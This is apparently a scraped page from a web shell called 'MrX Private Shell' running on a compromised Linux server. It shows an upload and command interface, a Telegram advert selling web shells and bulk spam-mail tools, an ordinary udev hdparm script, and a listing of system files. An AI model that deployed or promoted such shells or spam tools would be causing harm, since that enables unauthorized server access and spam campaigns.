__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
#!/bin/sh

set -e

[ -n "$DEVNAME" ] || exit 1

. /usr/lib/hdparm/hdparm-functions

if [ -e /proc/cmdline ]; then #linux only - future proofing against BSD and Hurd :)
        if grep -wq nohdparm /proc/cmdline ; then
                exit 0
        fi
fi

raidstat=OK
if [ -e /proc/mdstat ]; then
        if egrep -iq "resync|repair|recover|check" /proc/mdstat; then
                raidstat=RESYNC
        fi
elif [ -e /proc/rd/status ]; then
        raidstat=`cat /proc/rd/status`
fi

if ! [ "$raidstat" = 'OK' ]; then
        exit 1
fi

die() { echo "$*" 1>&2 ; exit 1; }
OPTIONS=$(hdparm_options $DEVNAME) || die "hdparm_options failed with: $OPTIONS"
apmopts=''
if [ -n "$OPTIONS" ]; then
        for opt in $OPTIONS; do
                case $opt in
                        (*'-B'*|*'-S'*|*'force_spindown_time'*)
                                apmopts='true'
                        ;;
                esac
        done
        if [ "$apmopts" = true ]; then
                /usr/lib/pm-utils/power.d/95hdparm-apm resume
        fi
        # strip -S (spindown) and -B (apm), force_spindown_time and -q
        # apm options are handled by /usr/lib/pm-utils/power.d/95hdparm-apm
        OPTIONS=$(echo $OPTIONS | perl -pe 's/((-S|-B|force_spindown_time)[\d]{1,3})|(-q\s?)//g')
        if [ -n "$OPTIONS" ]; then
                /usr/sbin/hdparm -q $OPTIONS $DEVNAME 2>/dev/null
        fi
fi

exit 0

Filemanager

Name Type Size Permission Actions
hwdb.d Folder 0755
rules.d Folder 0755
ata_id File 18.44 KB 0755
cdrom_id File 30.44 KB 0755
dmi_memory_id File 26.44 KB 0755
fido_id File 18.44 KB 0755
hdparm File 1.37 KB 0755
hid2hci File 14.45 KB 0755
hplj1000 File 6.56 KB 0755
hplj1005 File 6.56 KB 0755
hplj1018 File 6.56 KB 0755
hplj1020 File 6.56 KB 0755
hpljP1005 File 6.56 KB 0755
hpljP1006 File 6.56 KB 0755
hpljP1007 File 6.56 KB 0755
hpljP1008 File 6.56 KB 0755
hpljP1505 File 6.56 KB 0755
hpljP1505n File 6.56 KB 0755
hwdb.bin File 12.75 MB 0444
iocost File 22.55 KB 0755
iphone-set-info File 18.38 KB 0755
ipod-set-info File 42.46 KB 0755
libinput-device-group File 18.38 KB 0755
libinput-fuzz-extract File 14.38 KB 0755
libinput-fuzz-to-zero File 14.38 KB 0755
mtd_probe File 14.44 KB 0755
mtp-probe File 14.23 KB 0755
pcmcia-check-broken-cis File 14.53 KB 0755
pcmcia-socket-startup File 22.45 KB 0755
scsi_id File 34.99 KB 0755
snappy-app-dev File 22.3 KB 0755
udev-add-printer File 8.9 KB 0755
udev-configure-printer File 42.3 KB 0755
usb_modeswitch File 1.53 KB 0755
v4l_id File 14.44 KB 0755
Filemanager